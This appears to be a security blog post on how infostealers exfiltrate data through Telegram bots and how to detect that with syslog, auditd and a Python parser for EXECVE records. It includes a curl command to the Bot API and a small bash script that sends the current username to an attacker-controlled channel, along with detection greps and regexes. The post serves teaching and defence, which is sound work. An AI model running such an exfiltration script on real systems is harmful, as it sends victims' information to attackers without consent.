One of the most prominent threats right now is infostealers: malware that captures information from a device and sends the stolen data to an attacker. While this technique is integrated into other attacks (e.g. ransomware), it can also work on its own, for resale, cyber espionage and more.
In the past months, one of the most popular exfiltration methods has been through Telegram or Discord bots (which are also used for C2, Command and Control).
I've been asked a few times how this is done, so in this article, I'm creating a very simple example of how Telegram could be used to exfiltrate and how to detect that attempt. Let's go!
Telegram bot
In order to do this, a Telegram Bot and a Channel are required. You need to create a bot with the help of BotFather and then create a Channel and add the bot to it. Send a message to the Channel and then use the following to get the Channel info:
https://api.telegram.org/bot<BotToken>/getUpdates
As described here, this will allow you to get the Channel ID. Once you know the channel ID, you can send a message using:
curl 'https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=<my message>'
Understanding this, we could create a script that enumerates the system information and sends a message describing it. Let's create a really simple example that just sends the whoami output for the sake of the example. Of course, this could include way more things such as architecture, disk info and more. Most of these sorts of samples will also attempt to check crypto wallet info.
Anyway, let's say we have the following script:
#!/bin/bash
# Send the current username to the Telegram channel through the bot
messa=$(whoami)
mycommand="https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=$messa"
curl "$mycommand"
When this is executed, the username is sent to the channel.
Now, most of these will install the script in cron using crontab and delete the shell history. In case the crontab log is still intact, we will be able to see the crontab edit using:
cat /var/log/syslog | grep -w 'crontab'
But let's explore a cooler option: auditd.
Now, installing auditd is fairly simple. And while you can create your own rules, you can also use a default configuration and you are good to go!
Now, if we use:
sudo cat /var/log/audit/audit.log | grep telegram | grep api
we would be able to see the attempt of our script, provided the rule set records execve calls, so that the full curl command line (URL included) lands in an EXECVE record.
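As an added example (not code from the original post), here is a small Python parser for the EXECVE records that the grep above reads. It also decodes argv values that auditd hex-encodes when they contain whitespace or quotes, which a plain `grep telegram` never matches, and it masks the bot token before reporting. The log lines are constructed; the bot token and chat id are placeholders.

```python
import re

# Constructed sample audit.log lines (not from a real system). The third event
# shows an argv value that auditd hex-encodes because it contains a space.
_SPACED_URL = ("https://api.telegram.org/bot<BotToken>/sendMessage"
               "?chat_id=<channelId>&text=root x86_64")
SAMPLE_AUDIT_LOG = "\n".join([
    'type=SYSCALL msg=audit(1700000000.101:201): arch=c000003e syscall=59 '
    'success=yes exit=0 comm="curl" exe="/usr/bin/curl"',
    'type=EXECVE msg=audit(1700000000.101:201): argc=2 a0="curl" '
    'a1="https://api.telegram.org/bot<BotToken>/sendMessage?chat_id=<channelId>&text=www-data"',
    'type=EXECVE msg=audit(1700000000.202:202): argc=2 a0="curl" a1='
    + _SPACED_URL.encode().hex().upper(),
    'type=EXECVE msg=audit(1700000000.303:203): argc=3 a0="curl" a1="-s" '
    'a2="https://example.com/health"',
])

_FIELD_RE = re.compile(r'(\S+?)=("(?:[^"\\]|\\.)*"|\S+)')   # key=value tokens
_HEX_RE = re.compile(r'^(?:[0-9A-Fa-f]{2})+$')              # hex-encoded value
_MSG_RE = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')      # timestamp:event id
_TELEGRAM_RE = re.compile(r'api\.telegram\.org/bot[^/\s"]+/\w+', re.IGNORECASE)


def parse_execve(line):
    """Return (event_id, argv) for an EXECVE record, or None for other types."""
    if not line.startswith("type=EXECVE "):
        return None
    m = _MSG_RE.search(line)
    event_id = m.group(2) if m else "?"
    argv = {}
    for key, raw in _FIELD_RE.findall(line):
        if not re.fullmatch(r"a\d+", key):        # only a0, a1, ... are argv
            continue
        if raw.startswith('"'):
            value = raw[1:-1]                      # plain quoted value
        elif _HEX_RE.match(raw):
            value = bytes.fromhex(raw).decode("utf-8", "replace")  # auditd hex
        else:
            value = raw
        argv[int(key[1:])] = value
    return event_id, [argv[i] for i in sorted(argv)]


def find_telegram_exfil(audit_text):
    """Flag EXECVE events whose command line reaches the Telegram Bot API."""
    findings = []
    for line in audit_text.splitlines():
        parsed = parse_execve(line)
        if parsed is None:
            continue
        event_id, argv = parsed
        cmdline = " ".join(argv)
        if _TELEGRAM_RE.search(cmdline):
            masked = re.sub(r'(api\.telegram\.org/bot)[^/\s"]+', r'\1<redacted>', cmdline)
            findings.append((event_id, masked))
    return findings
```

Pipe `sudo cat /var/log/audit/audit.log` into `find_telegram_exfil` to run it on a real log; the event id lets you join the hit back to its SYSCALL record (uid, ppid, cwd).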
Sometimes these attacks include messing up /var/log, so keeping a backup of the logs in a different path could be useful, too.
Anyway, this was a simple, friendly introduction. Expect more complex attacks! (and simpler, too :) )
If you are curious about analyzing real life samples, take a look at my older posts about setting up a custom Linux honeypot. Most of the things I capture are miners, which share some common characteristics with infostealers (messing with cron for persistence, attempting enumeration, attempting Dynamic Linker Hijacking attacks, and more).
Top comments (2)
The exfiltrator stores their API key in plain text? Or is that encrypted somehow?